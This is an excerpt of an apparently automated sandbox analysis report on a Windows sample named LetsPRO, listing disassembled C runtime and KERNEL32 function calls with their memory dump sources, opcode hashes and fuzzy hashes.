                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _errno_invalid_parameter_noinfoiswctype
                                        • String ID: $
                                        • API String ID: 1743973646-3993045852
                                        • Opcode ID: ac4050328b5be04752514a11b9f4d81dd328c6b1d60674fb7a5ef682788435ad
                                        • Instruction ID: d420d8f312072717695a38b8f253f2b65cf3fc785001a2f733a4ffef106fb18e
                                        • Opcode Fuzzy Hash: ac4050328b5be04752514a11b9f4d81dd328c6b1d60674fb7a5ef682788435ad
                                        • Instruction Fuzzy Hash: A5512872B052A9DBDF148F19C94839E37B8BF1232CF24021EE86497D90D774CA90CB92
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C9429F3 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 162COMMON
                                        Download Yara Rule
                                        APIs
                                        • ??_U@YAPAXI@Z.MSVCR100(00000000,?,00000000,?,?,?,?,?,?,?,?,6C93D101,?,00000000,?,00000000), ref: 6C942A21
                                        • ??_U@YAPAXI@Z.MSVCR100(00000000,?,00000000,?,?,?,?,?,?,?,?,6C93D101,?,00000000,?,00000000), ref: 6C942AA3
                                        • ??_V@YAXPAX@Z.MSVCR100(?,?,?,00000000,?,?,?,?,?,?,?,?,6C93D101,?,00000000,?), ref: 6C942BD1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: ,$,
                                        • API String ID: 0-220654547
                                        • Opcode ID: a455ec434fcc31990286b90614fb51c52ec4ccd9dc5fbf89711b3c0c1b1b45bd
                                        • Instruction ID: e612989625e899b65816f260200e1161628d7a10f6ef0f1681d92b988b86d966
                                        • Opcode Fuzzy Hash: a455ec434fcc31990286b90614fb51c52ec4ccd9dc5fbf89711b3c0c1b1b45bd
                                        • Instruction Fuzzy Hash: 78515B71A05B0ADFCB28CF64C494BAEBBB5FF45304F24852ED496E7A50D730A940CB51
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C93C737 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMON
                                        Download Yara Rule
                                        APIs
                                        • EnterCriticalSection.KERNEL32(?), ref: 6C93C749
                                        • LeaveCriticalSection.KERNEL32(?), ref: 6C93C80A
                                        • SetEvent.KERNEL32(?), ref: 6C93C819
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: CriticalSection$EnterEventLeave
                                        • String ID: $$,
                                        • API String ID: 3094578987-53852779
                                        • Opcode ID: 0013081b1a2be0f5eefcafd966e912dbc886c066fd311536b6b55b85f5666d45
                                        • Instruction ID: 5a5146a5b3e4388d408e9a6d46f3bbc699d030b76f21555741093ec86a5bcec3
                                        • Opcode Fuzzy Hash: 0013081b1a2be0f5eefcafd966e912dbc886c066fd311536b6b55b85f5666d45
                                        • Instruction Fuzzy Hash: 47313674A00B2ADFCB14DF69C4C496ABBF5FF58308B1086ADD95A97A11C331E985CF90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C980262 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 84COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • __fltout2.LIBCMT ref: 6C980291
                                          • Part of subcall function 6C97FF57: ___dtold.LIBCMT ref: 6C97FF7D
                                          • Part of subcall function 6C97FF57: _$I10_OUTPUT.LIBCMT(?,?,00000016,?,?,?,6C980296,00000000,?,?,000000FF,00000016,?,?,000000A3,?), ref: 6C97FF98
                                          • Part of subcall function 6C97FF57: strcpy_s.MSVCR100(6C980296,?,?,?,?,00000016,?,?,?,6C980296,00000000,?,?,000000FF,00000016,?), ref: 6C97FFB8
                                        • _errno.MSVCR100(?,?,?,?,000000A3,?,?,?,?,000000FF,?,?,?,?,00000000,00000000), ref: 6C98029D
                                        • _invalid_parameter_noinfo.MSVCR100(?,?,?,?,000000A3,?,?,?,?,000000FF,?,?,?,?,00000000,00000000), ref: 6C9802A4
                                          • Part of subcall function 6C97B066: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6C94B73F,?,6C94C2BB,00000003,6C9274E4,6C90A988,0000000C,6C927537,00000001,00000001), ref: 6C97B06D
                                        • __fptostr.LIBCMT ref: 6C9802EF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: I10____dtold__fltout2__fptostr_errno_invalid_parameter_invalid_parameter_noinfostrcpy_s
                                        • String ID: -
                                        • API String ID: 3041646763-2547889144
                                        • Opcode ID: 573a80d87e8f4b79d83c57c96b65d4367017b3916c7cd3a96d31ee241bdf553d
                                        • Instruction ID: 199a18220ffe1573d4852449b4d63e690be2a7d046ad4c4927cb2aa358178779
                                        • Opcode Fuzzy Hash: 573a80d87e8f4b79d83c57c96b65d4367017b3916c7cd3a96d31ee241bdf553d
                                        • Instruction Fuzzy Hash: 9B21F877A02149AFDB088F78CC40ADF7768EF59314F05892DE922E7A80EB31D914C760
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C905DB6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 82COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _errno_invalid_parameter_noinfo
                                        • String ID: P
                                        • API String ID: 2959964966-3110715001
                                        • Opcode ID: 9f2c64eaa6832c655def3acbb2f7c92009d2817e92d7af2d645ddf0d40d0afe2
                                        • Instruction ID: e2e7a2ba4be3661cfa5cb36739e562d1c3ee4123389c9a475a7d0f189c490f94
                                        • Opcode Fuzzy Hash: 9f2c64eaa6832c655def3acbb2f7c92009d2817e92d7af2d645ddf0d40d0afe2
                                        • Instruction Fuzzy Hash: 4D213433719545EFCB216E5C888888D76ADAF21318B21056EE5E09BA50EB75C844C3A9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C93B488 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 74COMMON
                                        Download Yara Rule
                                        APIs
                                        • memcpy.MSVCR100(?,?,00000018), ref: 6C93B497
                                        • ??_U@YAPAXI@Z.MSVCR100(00000000,?,?,00000018), ref: 6C93B4B0
                                        • _memset.LIBCMT(00000000,00000000,?), ref: 6C93B4E1
                                        • memcpy.MSVCR100(?,?,00000008), ref: 6C93B507
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: memcpy$_memset
                                        • String ID: ,
                                        • API String ID: 2982297706-3772416878
                                        • Opcode ID: fd82e800af150714252bffa0b18cf0a4e4eac789d416ee70e6f04c49ec923ac6
                                        • Instruction ID: 3134f94c7516679818bd83cc8b76a72b8d2f903253f7504184a8bc06a56f2338
                                        • Opcode Fuzzy Hash: fd82e800af150714252bffa0b18cf0a4e4eac789d416ee70e6f04c49ec923ac6
                                        • Instruction Fuzzy Hash: CE210871601B00AFD724CF28CD89E6BB7F9EF94314F21951DD1098B641E775E845C750
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C94ABEA Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 72threadCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 6C9403CA: TlsGetValue.KERNEL32(6C9361E5), ref: 6C9403DC
                                        • GetCurrentThreadId.KERNEL32 ref: 6C94AC12
                                        • swprintf.LIBCMT(?,00000401,[%d:%d:%d:%d(%d)] ,00000000,?,6C94A994,?,?,000000F8), ref: 6C94AC3C
                                        • vswprintf_s.MSVCR100(00000401,00000401,?,?,?,00000002,?,6C94A994,?,?,000000F8), ref: 6C94AC5E
                                        • _wcslen.LIBCMT(?,00000401,00000401,?,?,?,00000002,?,6C94A994,?,?,000000F8), ref: 6C94AC64
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: CurrentThreadValue_wcslenswprintfvswprintf_s
                                        • String ID: [%d:%d:%d:%d(%d)]
                                        • API String ID: 3978057885-3832470304
                                        • Opcode ID: 1ca77051d431633d7199ff31733f4474a9b605a56b7d019355551c429a9e6096
                                        • Instruction ID: 9280e35f965978356b8b70adc5dd01ed562f63ac3d663ea32a3dc3b8f7d040cf
                                        • Opcode Fuzzy Hash: 1ca77051d431633d7199ff31733f4474a9b605a56b7d019355551c429a9e6096
                                        • Instruction Fuzzy Hash: C41138322006009BC7618FAACC48E5B77BDEFD5B15715C529F919CBA60EF31C4468B95
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C904D96 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51stringCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • strcat_s.MSVCR100(6C906E68,6C906E47,6C906E58,?,00000083,00000083,?,6C906E5C,6C906E47,6C906E68,00000002,6C906E68,6C906E47,?,00000000,00000000), ref: 6C904DB5
                                        • __invoke_watson.LIBCMT(00000000,00000000,00000000,00000000,00000000,6C906E47,6C906E68,00000002,6C906E68,6C906E47,?,00000000,00000000,00000005), ref: 6C930B34
                                        • __invoke_watson.LIBCMT(00000000,00000000,00000000,00000000,00000000), ref: 6C930B3F
                                        • _strcspn.LIBCMT(00000000,_.,,00000000,00000000,00000005), ref: 6C930B4D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: __invoke_watson$_strcspnstrcat_s
                                        • String ID: _.,
                                        • API String ID: 4004410220-2709443920
                                        • Opcode ID: 35a3a97dc44cce4fae9b26e5e7cb871344d04a75c59757bd7becc7d09d574def
                                        • Instruction ID: 2389826cb2ea4bdceeaab0c8d889c2faf4fa75839857784942ad84893137b854
                                        • Opcode Fuzzy Hash: 35a3a97dc44cce4fae9b26e5e7cb871344d04a75c59757bd7becc7d09d574def
                                        • Instruction Fuzzy Hash: 53F09072608259AB8B100E65AC808CF372DBBA127CB10693AFE3C92A01D731E555DEA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C937483 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51timeCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • CreateTimerQueue.KERNEL32(00000001,?,?,00000000,?,00000000,F3B6147F,00000000,?,?), ref: 6C9374AB
                                        • std::exception::exception.LIBCMT(?,00000001,00000001,?,?,00000000), ref: 6C937504
                                        • _CxxThrowException.MSVCR100(F3B6147F,6C90C8D8,?,00000001,00000001,?,?,00000000), ref: 6C937519
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: CreateExceptionQueueThrowTimerstd::exception::exception
                                        • String ID: bad allocation
                                        • API String ID: 3396838967-2104205924
                                        • Opcode ID: 936f1cd7731e6815e9313804630a73b9fd90b2673382098234bfd0672f916bf8
                                        • Instruction ID: 0142a01e090f269b9b5379d02eaa83c5b0b0b36f3eea185989e46633208474e2
                                        • Opcode Fuzzy Hash: 936f1cd7731e6815e9313804630a73b9fd90b2673382098234bfd0672f916bf8
                                        • Instruction Fuzzy Hash: 2511C231B0A226DFCB04CF99D941A9E77B9BF49708B601419D405D3A00EB30E501CB9A
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C90C5F9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_catch.LIBCMT ref: 6C90C600
                                        • _malloc_crt.MSVCR100(00000018,00000014,6C90C681,00000000,00000000,?), ref: 6C90C60D
                                          • Part of subcall function 6C900B61: malloc.MSVCR100(00000001,00000001,00000001,?,6C90A9B4,00000018,6C90A988,0000000C,6C927537,00000001,00000001,?,6C901F15,0000000D), ref: 6C900B6D
                                        • std::exception::exception.LIBCMT(?,00000001,00000014,6C90C681,00000000,00000000), ref: 6C927300
                                        • _CxxThrowException.MSVCR100(6C90C681,6C90C8D8,?,00000001,00000014), ref: 6C927315
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: ExceptionH_prolog3_catchThrow_malloc_crtmallocstd::exception::exception
                                        • String ID: bad allocation
                                        • API String ID: 2340149201-2104205924
                                        • Opcode ID: 1550dcb43e1a4318b69d07626cf2f570892f9407132b3017f37d272520edc95e
                                        • Instruction ID: 6aed8cb765be920db3eb1a5a237cdf38c9d74a99620fc24ec29ad65158e11b09
                                        • Opcode Fuzzy Hash: 1550dcb43e1a4318b69d07626cf2f570892f9407132b3017f37d272520edc95e
                                        • Instruction Fuzzy Hash: EE012C71640208AFDB08DF58C846FDEBBB4EF68715F10846EE504ABB91CBB4D6048F65
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C901ECB Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • GetModuleHandleW.KERNEL32(KERNEL32.DLL,6C901F68,00000008,6C927629,00000000,00000000), ref: 6C901EDC
                                        • _lock.MSVCR100(0000000D), ref: 6C901F10
                                          • Part of subcall function 6C900940: EnterCriticalSection.KERNEL32(00000001,00000001,?,6C901F15,0000000D), ref: 6C90095B
                                        • InterlockedIncrement.KERNEL32(?), ref: 6C901F1D
                                          • Part of subcall function 6C901E7E: _unlock.MSVCR100(0000000D,6C901F2F), ref: 6C901E80
                                        • _lock.MSVCR100(0000000C), ref: 6C901F31
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _lock$CriticalEnterHandleIncrementInterlockedModuleSection_unlock
                                        • String ID: KERNEL32.DLL
                                        • API String ID: 2973837600-2576044830
                                        • Opcode ID: 052c57558111782fc859434555a881c3e26c7e78eed239f86881e3bc7122ee21
                                        • Instruction ID: 926cac5aeaa9153698d059278660409b05a7dba8345525d13b87c2aebb746a5b
                                        • Opcode Fuzzy Hash: 052c57558111782fc859434555a881c3e26c7e78eed239f86881e3bc7122ee21
                                        • Instruction Fuzzy Hash: 01018471A04B40DFE7209F66D405B89FBF0AFA2328F10594ED5A656BA0CB74E544CF15
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C945836 Relevance: 7.8, APIs: 5, Instructions: 260COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_catch.LIBCMT ref: 6C94583D
                                          • Part of subcall function 6C9454A1: __EH_prolog3.LIBCMT ref: 6C9454A8
                                          • Part of subcall function 6C9403E6: TlsGetValue.KERNEL32(6C945C13,?,00000000,?,6C935CE7,00000001), ref: 6C9403EC
                                        • Concurrency::unsupported_os::unsupported_os.LIBCMT ref: 6C9458B2
                                        • _CxxThrowException.MSVCR100(?,6C9A0CD4), ref: 6C9458C0
                                        • Concurrency::unsupported_os::unsupported_os.LIBCMT ref: 6C945A06
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Concurrency::unsupported_os::unsupported_os$ExceptionH_prolog3H_prolog3_catchThrowValue
                                        • String ID:
                                        • API String ID: 1539510839-0
                                        • Opcode ID: d4313feed53bbf05f19b84efcc7728695ac0d23970466cc78c89e45c0630dbee
                                        • Instruction ID: 6a7c82d957393de9adb9dfd24d6a0eeeb9f6dbac6d78f7c792e1efc744420155
                                        • Opcode Fuzzy Hash: d4313feed53bbf05f19b84efcc7728695ac0d23970466cc78c89e45c0630dbee
                                        • Instruction Fuzzy Hash: 45A1A630A05605DFDB04CFA9C980BAAB7F9BF19328F54C459E852CBB51DB34E849CB80
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C8F3E20 Relevance: 7.7, APIs: 5, Instructions: 160COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___libm_error_support.LIBCMT ref: 6C8F3ED5
                                          • Part of subcall function 6C99B408: DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,6C9195E3), ref: 6C99B426
                                          • Part of subcall function 6C99B408: _errno.MSVCR100 ref: 6C99B4C5
                                        • __ctrlfp.LIBCMT ref: 6C99B817
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: DecodePointer___libm_error_support__ctrlfp_errno
                                        • String ID:
                                        • API String ID: 3902546397-0
                                        • Opcode ID: 5062b8dfd9ea92034d2faf5443536cf1e4c019b7f2d0087ea45130e6e4b2e1ec
                                        • Instruction ID: 03fa8135cf132c698d5390cef35fead8c31320fa8a52394a70884c1c3ba0c80e
                                        • Opcode Fuzzy Hash: 5062b8dfd9ea92034d2faf5443536cf1e4c019b7f2d0087ea45130e6e4b2e1ec
                                        • Instruction Fuzzy Hash: 19519D71808709A6DF216B39D5452AE7BB8FF59384F14CBAAF4D851580EF34C848C313
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C957A49 Relevance: 7.6, APIs: 5, Instructions: 122COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • _errno.MSVCR100(6C957BC8,00000008), ref: 6C957A63
                                        • _invalid_parameter_noinfo.MSVCR100(6C957BC8,00000008), ref: 6C957A6E
                                          • Part of subcall function 6C97B066: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6C94B73F,?,6C94C2BB,00000003,6C9274E4,6C90A988,0000000C,6C927537,00000001,00000001), ref: 6C97B06D
                                        • _errno.MSVCR100(6C957BC8,00000008), ref: 6C957A82
                                        • _errno.MSVCR100(6C957BC8,00000008), ref: 6C957A9B
                                        • _errno.MSVCR100(6C957BC8,00000008), ref: 6C957B85
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _errno$_invalid_parameter_invalid_parameter_noinfo
                                        • String ID:
                                        • API String ID: 4106058386-0
                                        • Opcode ID: b4f4600035a524477fe98ef068600e5c933d4da3c02715c1c136c058edac1df2
                                        • Instruction ID: c7cc5b395ebe173811d92d387c9588f94e3b4ceda6ce75930eff766457348c95
                                        • Opcode Fuzzy Hash: b4f4600035a524477fe98ef068600e5c933d4da3c02715c1c136c058edac1df2
                                        • Instruction Fuzzy Hash: 81316876E766118AD718CE29845037D766BFF52328FE9C21DD8628BEC0EB30C7608790
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C953BE7 Relevance: 7.6, APIs: 5, Instructions: 122COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • _errno.MSVCR100(6C953D58,00000008), ref: 6C953C01
                                        • _invalid_parameter_noinfo.MSVCR100(6C953D58,00000008), ref: 6C953C0C
                                          • Part of subcall function 6C97B066: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6C94B73F,?,6C94C2BB,00000003,6C9274E4,6C90A988,0000000C,6C927537,00000001,00000001), ref: 6C97B06D
                                        • _errno.MSVCR100(6C953D58,00000008), ref: 6C953C20
                                        • _errno.MSVCR100(6C953D58,00000008), ref: 6C953C39
                                        • _errno.MSVCR100(6C953D58,00000008), ref: 6C953D1B
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _errno$_invalid_parameter_invalid_parameter_noinfo
                                        • String ID:
                                        • API String ID: 4106058386-0
                                        • Opcode ID: 295215131a4111ee7fe2ff33b57a9143236af7ebcf53f2a79f5aee6a9802cb19
                                        • Instruction ID: 2732abee67d7eedfa6ef52ed042097625f7b67c303fbab618ea1d381f207917b
                                        • Opcode Fuzzy Hash: 295215131a4111ee7fe2ff33b57a9143236af7ebcf53f2a79f5aee6a9802cb19
                                        • Instruction Fuzzy Hash: 7E411431AC97849AD702CE3AC4403593BA5BF5332CFE88258DCA48FE91DB75C5619B50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C9603AE Relevance: 7.6, APIs: 5, Instructions: 117stringCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • strncmp.MSVCR100(?,?,00000000,00000080,00000080), ref: 6C9603DE
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
